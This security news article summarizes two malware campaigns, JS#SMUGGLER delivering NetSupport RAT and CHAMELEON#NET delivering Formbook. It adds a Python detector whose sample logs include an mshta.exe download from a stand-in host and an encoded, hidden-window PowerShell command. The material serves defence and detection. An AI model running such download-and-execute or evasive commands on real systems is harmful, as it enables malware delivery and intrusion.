Experts Confirm JS#SMUGGLER Uses Compromised Sites to Deliver NetSupport RAT

A newly identified cyber campaign called JS#SMUGGLER is gaining attention after researchers observed attackers using compromised websites to distribute NetSupport RAT, a remote access tool capable of giving full control over victim devices.

Security analysts from Securonix reported that the operation relies on several coordinated components, including an obfuscated JavaScript loader, an HTML Application (HTA) file executed through mshta.exe, and a PowerShell-based payload responsible for retrieving and deploying the malware.

How the Infection Chain Operates

The compromised websites contain hidden redirects that silently load an obfuscated JavaScript file known as phone.js. This loader checks whether the visitor is using a mobile device or a desktop. Depending on the device, it either displays a full-screen iframe redirect or triggers the next stage by loading another remote script.

This JavaScript component includes a tracking feature that ensures the malicious code activates only during a victim's first visit, reducing the chance of detection by security tools.

The next stage constructs a URL at runtime that is used to download an HTA file. Once executed through mshta.exe, the HTA loader writes an encrypted PowerShell stager to disk, decrypts it, and runs it directly in memory to evade detection tools. The stager then fetches the NetSupport RAT payload, giving the attacker remote desktop access, command execution, file operations, proxy functions, and full system control.

The HTA file minimizes itself and hides all window elements to operate silently. After launching the payload, the stager is removed from disk to reduce forensic traces.

Why This Campaign Is Hard to Detect

Researchers noted that the layered structure, obfuscation, device-aware behavior, and fileless execution techniques indicate a well-maintained, professional-level malware framework. Because it relies on compromised websites, the target group appears broad rather than focused on a specific country or sector.

Security teams are advised to implement a strong Content Security Policy (CSP), enable script monitoring, restrict mshta.exe usage, and enforce PowerShell logging to detect suspicious activity linked to this malware family.
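As an added illustration of the detection advice above (example code, not Securonix's or the original article's), the following Python flags the mshta.exe-to-PowerShell pattern from the infection chain over constructed process-creation log lines; the JSON field names are an assumed generic layout, not any specific product's schema.

```python
import json

# Constructed sample log (one JSON object per line) of process-creation
# events. Field names are an assumed generic layout, not a product schema.
SAMPLE_LOG = r"""
{"pid": 4001, "image": "C:\\Windows\\System32\\mshta.exe", "parent_image": "C:\\Program Files\\Browser\\browser.exe", "cmdline": "mshta.exe http://example.invalid/stage.hta"}
{"pid": 4002, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "powershell.exe -w hidden -ep bypass -enc SQBFAFgA"}
{"pid": 4003, "image": "C:\\Windows\\System32\\mshta.exe", "parent_image": "C:\\Windows\\explorer.exe", "cmdline": "mshta.exe C:\\Users\\bob\\Documents\\report.hta"}
{"pid": 4004, "image": "C:\\Windows\\System32\\notepad.exe", "parent_image": "C:\\Windows\\explorer.exe", "cmdline": "notepad.exe notes.txt"}
"""

# PowerShell switches that hide the window or carry an encoded script.
ENCODED_FLAGS = (" -enc", " -encodedcommand", " -w hidden", " -windowstyle hidden")


def parse_log(text):
    """Parse JSON-lines process events, skipping blank or malformed lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag_events(events):
    """Return (pid, reason) pairs that match the mshta.exe -> PowerShell chain."""
    findings = []
    for ev in events:
        img, parent = basename(ev["image"]), basename(ev["parent_image"])
        cmd = " " + ev["cmdline"].lower()
        if img == "mshta.exe" and ("http://" in cmd or "https://" in cmd):
            findings.append((ev["pid"], "mshta.exe launched with a remote URL"))
        if img == "powershell.exe" and parent == "mshta.exe":
            findings.append((ev["pid"], "powershell.exe spawned by mshta.exe"))
        if img == "powershell.exe" and any(f in cmd for f in ENCODED_FLAGS):
            findings.append((ev["pid"], "PowerShell run with encoded or hidden-window flags"))
    return findings


if __name__ == "__main__":
    for pid, reason in flag_events(parse_log(SAMPLE_LOG)):
        print(f"pid {pid}: {reason}")
```

The local-file mshta.exe event (pid 4003) is deliberately not flagged by the URL rule, so a rule set that only watches for remote HTA downloads still needs the parent/child and PowerShell-flag checks to catch later stages.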

CHAMELEON#NET Campaign Delivers Formbook Malware

In a related report, Securonix also detailed a separate multi-stage malware operation known as CHAMELEON#NET, which uses phishing emails to distribute Formbook, a well-known keylogger and information-stealing malware.

Phishing Emails and Initial Infection

The campaign focuses on tricking victims in the National Social Security Sector by sending emails that encourage users to download a BZ2 archive. This triggers a complex infection chain starting with a heavily obfuscated JavaScript dropper.

This dropper extracts two JavaScript files into the system’s TEMP directory:

svchost.js, which drops a .NET loader named DarkTortilla (QNaZg.exe), a crypter commonly used to distribute secondary payloads
adobe.js, which drops PHat.jar, an MSI package with similar functionality

The main loader is designed to decrypt and execute Formbook entirely in memory, a fileless execution method that avoids antivirus detection. The malware is added to the Windows startup folder or the system registry to maintain persistence.

Advanced Evasion and Social Engineering

The attackers combine email-based social engineering with layers of script obfuscation and .NET evasion mechanics. By using conditional XOR-based decryption, reflective loading, and staged execution, the threat actors significantly complicate forensic analysis and detection by traditional security tools.

Security researchers noted that the overall structure of both JS#SMUGGLER and CHAMELEON#NET reflects a rising trend of multi-layered, stealthy malware operations targeting enterprise users through manipulated websites and deceptive emails.
